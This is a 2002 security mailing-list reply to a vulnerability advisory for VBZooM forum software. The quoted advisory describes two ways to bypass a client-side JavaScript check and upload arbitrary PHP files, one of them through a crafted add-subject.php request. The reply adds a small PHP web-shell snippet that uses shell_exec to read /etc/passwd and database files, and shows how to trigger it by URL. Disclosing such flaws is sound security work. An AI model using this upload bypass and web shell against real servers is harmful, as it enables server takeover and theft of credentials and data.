Re: upload malicious file in VBZooM forums

["M. Zeeshan Mustafa" <zolo () pk bluesoft us>]

A damage could be alot more than assessed by hish in his last email, and not just
infecting the visitors of the forum, but a critical server risk.

For instance if an attacker makes a perl/php script of malicious code,
he could takeover the server with httpd-user id.

An attacker could create file with similar code below, and will upload
it with the extention .php ...

<?php
$cmd = "cat /etc/passwd"; // or
$cmd = "cat ".dirname($_SERVER['PATH_TRANSLATED'])."/path.to.database.headers"; // or
$cmd ="echo \"This is an example \">".dirname($_SERVER['PATH_TRANSLATED'])."/hacked";
$h = shell_exec($cmd);
echo $h;
?>

...and then he will call the url from his browser to execute the script...

http://host/forums/<attacker-file.php>

the said $cmd will execute.

Regards,
-- 
M. Zeeshan Mustafa
Software Security Specialist & Architect
E: security () zeeshan net
C: +92(0)300-9249567
W: http://www.zeeshan.net

On Wednesday 09 October 2002 09:21 pm, hish _ hish wrote:
::::: Name:    VBZooM
::::: Version Affected:  tested on v1.01 maybe other version vulnerable also
::::: Severity:  Critical
::::: Category: upload system
::::: Vendor URL:   http://www.vbzoom.com
::::: Author:   hish_hish <hish_hish565 () hotmail com>
::::: Date:  discloused on 28th Aug 2002
:::::            published at 8th oct 2002
::::: 
::::: Description
::::: ***********
::::: VBZooM is bulletin board system which written in php,
::::: the problem lay on file upload system, the script uses JavaScript to check 
::::: for valid extinsions.
::::: and you can bypass this check in two ways (see Details).
:::::  
:::::  
::::: Details
::::: *******
::::: there are two ways to bypass the JavaScript file extinsion check,
::::: 
::::: 1st :
:::::  you should be a member in the victim script,
:::::  and go to make new subject, now save the page in your hard drive
:::::  and remove the JavaScript code    // at the last of the page
:::::  and make some changes in <form action="add-subject.php ......>
:::::  to <form action="http://victim/VBZoom/add-subject.php ....>
:::::  now select your malicious file to upload it (should be .php)
:::::  OK now hit submit bottom , the forum will redirect you to your subject
:::::  douh :) your file waiting you as attachment :)
::::: NOTE : all visitor can see and use your uploaded file , so forget the 1st 
::::: way and see 2nd: .
:::::  
::::: 2nd:
::::: 
:::::  you dont need to be a member in victim forum , just follow me :) .
:::::  http://www.victim.com/VBZooM/add-subject.php?Success=1
:::::  &FileName=SourceFile&FileName_size=500&FileName_name=DistFile
:::::  it will upload your file in "/download" directory.
:::::  now execute your .php file  
::::: http://www.victim.com/VBZooM/download/DistFile  :))
:::::  
::::: 
::::: Fix Information
::::: ***************
::::: contact http://www.vbzoom.com
::::: 
::::: 
:::::